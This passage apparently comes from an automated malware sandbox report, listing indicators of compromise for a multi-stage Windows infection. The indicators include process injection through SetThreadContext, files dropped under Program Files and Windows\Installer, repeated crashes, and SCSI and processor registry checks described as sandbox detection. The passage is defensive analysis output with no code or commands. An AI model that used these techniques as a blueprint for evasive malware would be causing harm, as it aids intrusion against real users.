Fri10d184202996a0d7f.exe6450217.scr7375211.scr2412914.scr7926442.scrFagG1SGQfnP6IjkfVBdFalhu.exePlj_3DiKRZBFwjHkdIqlcQSo.exen1SlVGQ44lcYrFuYBI4Z3Kwx.exe77eW5iVFnAmHMmCyd37f2UET.exeWMIC.exeE7nn_1406j8v_DAvaZ603zjG.exe3cz5pAmGIdhR8wlRxJOvpwBP.exe6165866.scr4918688.scr1603748.scr8591180.scr691F.exe4105.exepid process 4768 Fri10d184202996a0d7f.exe 5420 6450217.scr 5200 7375211.scr 5904 2412914.scr 4536 7926442.scr 2908 FagG1SGQfnP6IjkfVBdFalhu.exe 6180 Plj_3DiKRZBFwjHkdIqlcQSo.exe 6244 n1SlVGQ44lcYrFuYBI4Z3Kwx.exe 6216 77eW5iVFnAmHMmCyd37f2UET.exe 6356 WMIC.exe 5368 E7nn_1406j8v_DAvaZ603zjG.exe 6252 3cz5pAmGIdhR8wlRxJOvpwBP.exe 3416 6165866.scr 5064 4918688.scr 2336 1603748.scr 3832 8591180.scr 7496 691F.exe 2468 4105.exe 2468 4105.exe 2468 4105.exe 2468 4105.exe 2468 4105.exe 2468 4105.exe 2468 4105.exe 2468 4105.exe 2468 4105.exe 2468 4105.exe 2468 4105.exe 2468 4105.exe 2468 4105.exe 2468 4105.exe -
Suspicious use of SetThreadContext 7 IoCs
Processes:
Firstoffer.exeQJDpWADJj1cP20LBomCpIKc_.exeE361.exe1B79.exe4105.exeWMIC.exetmp89D2_tmp.exedescription pid process target process PID 3552 set thread context of 5616 3552 Firstoffer.exe Fri106e757f6d75.exe PID 1812 set thread context of 5432 1812 QJDpWADJj1cP20LBomCpIKc_.exe QJDpWADJj1cP20LBomCpIKc_.exe PID 8080 set thread context of 5088 8080 E361.exe E361.exe PID 6736 set thread context of 1124 6736 1B79.exe 1B79.exe PID 2468 set thread context of 3256 2468 4105.exe 4105.exe PID 8152 set thread context of 3400 8152 WMIC.exe Wud5sC2nC8mKLjpNoUGEzlnS.exe PID 6956 set thread context of 7608 6956 tmp89D2_tmp.exe tmp89D2_tmp.exe -
Drops file in Program Files directory 23 IoCs
Processes:
ultramediaburner.tmpSharefolder.exesetup_2.tmpM0b_iMMm_NntnJ8MGOKj6MkG.exeWerFault.exedescription ioc process File created C:\Program Files\Uninstall Information\YRIZTBHDAO\ultramediaburner.exe.config File opened for modification C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe ultramediaburner.tmp File created C:\Program Files (x86)\UltraMediaBurner\unins000.dat ultramediaburner.tmp File created C:\Program Files (x86)\UltraMediaBurner\Nuvicesuty.exe File created C:\Program Files (x86)\UltraMediaBurner\Nuvicesuty.exe.config File created C:\Program Files (x86)\PowerControl\Mashelobyxo.exe.config Sharefolder.exe File created C:\Program Files (x86)\FarLabUninstaller\unins000.dat setup_2.tmp File created C:\Program Files (x86)\UltraMediaBurner\is-QG6CF.tmp ultramediaburner.tmp File opened for modification C:\Program Files (x86)\Company\NewProduct\Uninstall.exe M0b_iMMm_NntnJ8MGOKj6MkG.exe File created C:\Program Files (x86)\Company\NewProduct\Uninstall.ini M0b_iMMm_NntnJ8MGOKj6MkG.exe File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe WerFault.exe File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe WerFault.exe File created C:\Program Files\Windows Media Player\NPSQKTDYBJ\foldershare.exe Sharefolder.exe File created C:\Program Files (x86)\PowerControl\Mashelobyxo.exe Sharefolder.exe File created C:\Program Files (x86)\FarLabUninstaller\is-42A3P.tmp setup_2.tmp File opened for modification C:\Program Files (x86)\FarLabUninstaller\unins000.dat setup_2.tmp File created C:\Program Files\Uninstall Information\YRIZTBHDAO\ultramediaburner.exe File created C:\Program Files (x86)\UltraMediaBurner\is-OESKO.tmp ultramediaburner.tmp File opened for modification C:\Program Files (x86)\UltraMediaBurner\unins000.dat ultramediaburner.tmp File opened for modification C:\Program Files (x86)\Company\NewProduct\cm3.exe M0b_iMMm_NntnJ8MGOKj6MkG.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe M0b_iMMm_NntnJ8MGOKj6MkG.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\inst002.exe M0b_iMMm_NntnJ8MGOKj6MkG.exe File created C:\Program Files\Windows Media Player\NPSQKTDYBJ\foldershare.exe.config Sharefolder.exe -
Drops file in Windows directory 28 IoCs
Processes:
msiexec.exeWerFault.exeMsiExec.exedescription ioc process File opened for modification C:\Windows\Installer\MSI5828.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8F67.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI5AAA.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSIADD0.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIB3DC.tmp msiexec.exe File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSIA1AA.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI29D0.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI544F.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSID465.tmp msiexec.exe File created C:\Windows\Tasks\AdvancedWindowsManager #1.job MsiExec.exe File created C:\Windows\SystemTemp\~DF4E7A801ACFE5C669.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSI9C88.tmp msiexec.exe File created C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62} msiexec.exe File opened for modification C:\Windows\Installer\2e8cf.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI4299.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI5018.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF2A9ADF88CE6AA796.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSIEAEC.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIF2AD.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF56742D7A9938FDF9.TMP msiexec.exe File created C:\Windows\Installer\2e8cf.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI4A4B.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI98FD.tmp msiexec.exe File created C:\Windows\SystemTemp\~DFF6C163626E0AC30F.TMP msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 39 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 5892 1004 WerFault.exe ShadowVPNInstaller_t3.exe 5112 5648 WerFault.exe rundll32.exe 5640 4668 WerFault.exe Fri105268dda3.exe 1784 5064 WerFault.exe Fri1015b9a4e0b.exe 2788 4448 WerFault.exe Fri10acd1e0a9e6.exe 2984 1004 WerFault.exe ShadowVPNInstaller_t3.exe 1160 4036 WerFault.exe rundll32.exe 4916 1004 WerFault.exe ShadowVPNInstaller_t3.exe 5764 3552 WerFault.exe Firstoffer.exe 1200 5900 WerFault.exe setup.exe 5940 1004 WerFault.exe ShadowVPNInstaller_t3.exe 5928 1004 WerFault.exe ShadowVPNInstaller_t3.exe 4248 1004 WerFault.exe ShadowVPNInstaller_t3.exe 6432 5800 WerFault.exe GcleanerEU.exe 3320 5576 WerFault.exe BvPolz1JLrEUFfkyuKjjUWkz.exe 4548 4220 WerFault.exe mTXXJdaUVWyjB_RdGHtfT7zu.exe 3340 3768 WerFault.exe vc.exe 3164 1196 WerFault.exe U5LisTvMX5gU8okdeY7zz5Yy.exe 7244 5140 WerFault.exe GsPD1a5eAJ9Jw9nfgKLNz8PO.exe 5608 5092 WerFault.exe 9GvwD_b5Wbw2W6pqbc6bz_pf.exe 6596 5668 WerFault.exe DCOPiLwlD2B11rHJvQSil2Vm.exe 676 1004 WerFault.exe ShadowVPNInstaller_t3.exe 4148 7424 WerFault.exe rundll32.exe 6552 1004 WerFault.exe ShadowVPNInstaller_t3.exe 7236 7280 WerFault.exe gcleaner.exe 7380 1004 WerFault.exe ShadowVPNInstaller_t3.exe 1032 7772 WerFault.exe 3A0E.exe 7748 1004 WerFault.exe ShadowVPNInstaller_t3.exe 7436 1004 WerFault.exe ShadowVPNInstaller_t3.exe 6336 2468 WerFault.exe 4105.exe 7888 1004 WerFault.exe ShadowVPNInstaller_t3.exe 6568 1556 WerFault.exe 36D4KJuQIhW2OmfRkZ4eFWq7.exe 5132 6496 WerFault.exe 6Vl3UOGOKgm7tmbpGrWoS6EW.exe 6340 4384 WerFault.exe 7C1C.exe 5236 1004 WerFault.exe ShadowVPNInstaller_t3.exe 1496 1004 WerFault.exe ShadowVPNInstaller_t3.exe 2796 7216 WerFault.exe GcleanerEU.exe 7220 4380 WerFault.exe gcleaner.exe 2976 6548 WerFault.exe rundll32.exe -
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
svchost.exeQJDpWADJj1cP20LBomCpIKc_.exevssvc.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Capabilities svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0018 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\FriendlyName svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI QJDpWADJj1cP20LBomCpIKc_.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0018 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\FriendlyName svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Capabilities svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\HardwareID svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Mfg svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\DeviceDesc svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\DeviceDesc svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038 svchost.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000312b64fa169c92a50000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000400600000000ffffffff000000002700010000080000312b64fa00000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005006000000000000a0f93f000000ffffffff000000000701010000280300312b64fa00000000000050060000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000312b64fa00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000312b64fa00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 svchost.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI QJDpWADJj1cP20LBomCpIKc_.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Mfg svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008 svchost.exe -
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
forfiles.exeWerFault.execmd.exeWerFault.exemshta.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.execmd.exeLzmwAqmV.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepowershell.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz forfiles.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision mshta.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 cmd.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 LzmwAqmV.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString mshta.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried 